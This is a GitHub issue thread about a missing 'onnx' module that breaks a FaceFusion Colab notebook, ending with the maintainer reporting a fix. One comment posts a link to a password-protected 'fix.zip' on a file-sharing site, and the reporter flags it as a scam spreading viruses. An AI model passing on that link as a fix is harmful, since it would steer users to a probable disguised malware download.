### ISSUE TITLE
Error for the next branch

### ISSUE THREAD

**Issue by nvm01** [Nick088Official/FaceFusion-Online-Ports#13]
Hello and thanks for maintaining this project!
The next branch of FaceFusion is not working anymore in the colab notebook giving this error:
```
/content/facefusion
Traceback (most recent call last):
  File "/content/facefusion/facefusion.py", line 7, in <module>
    from facefusion import core
  File "/content/facefusion/facefusion/core.py", line 8, in <module>
    from facefusion import content_analyser, face_classifier, face_detector, face_landmarker, face_masker, face_recognizer, logger, process_manager, state_manager, voice_extractor, wording
  File "/content/facefusion/facefusion/content_analyser.py", line 7, in <module>
    from facefusion import inference_manager, state_manager, wording
  File "/content/facefusion/facefusion/inference_manager.py", line 5, in <module>
    import onnx
ModuleNotFoundError: No module named 'onnx'
```

Let me know if it's possible to fix that.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nvm01** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Ban this scammer that spreads viruses.

**Comment by Nick088Official** [comment]
> Hello and thanks for maintaining this project! The next branch of FaceFusion is not working anymore in the colab notebook giving this error:
> 
> ```
> /content/facefusion
> Traceback (most recent call last):
>   File "/content/facefusion/facefusion.py", line 7, in <module>
>     from facefusion import core
>   File "/content/facefusion/facefusion/core.py", line 8, in <module>
>     from facefusion import content_analyser, face_classifier, face_detector, face_landmarker, face_masker, face_recognizer, logger, process_manager, state_manager, voice_extractor, wording
>   File "/content/facefusion/facefusion/content_analyser.py", line 7, in <module>
>     from facefusion import inference_manager, state_manager, wording
>   File "/content/facefusion/facefusion/inference_manager.py", line 5, in <module>
>     import onnx
> ModuleNotFoundError: No module named 'onnx'
> ```
> 
> Let me know if it's possible to fix that.

I checked this out and now it's all fixed!

**Comment by nvm01** [comment]
> > Hello and thanks for maintaining this project! The next branch of FaceFusion is not working anymore in the colab notebook giving this error:
> > ```
> > /content/facefusion
> > Traceback (most recent call last):
> >   File "/content/facefusion/facefusion.py", line 7, in <module>
> >     from facefusion import core
> >   File "/content/facefusion/facefusion/core.py", line 8, in <module>
> >     from facefusion import content_analyser, face_classifier, face_detector, face_landmarker, face_masker, face_recognizer, logger, process_manager, state_manager, voice_extractor, wording
> >   File "/content/facefusion/facefusion/content_analyser.py", line 7, in <module>
> >     from facefusion import inference_manager, state_manager, wording
> >   File "/content/facefusion/facefusion/inference_manager.py", line 5, in <module>
> >     import onnx
> > ModuleNotFoundError: No module named 'onnx'
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > Let me know if it's possible to fix that.
> 
> I checked this out and now it's all fixed!

Thanks!
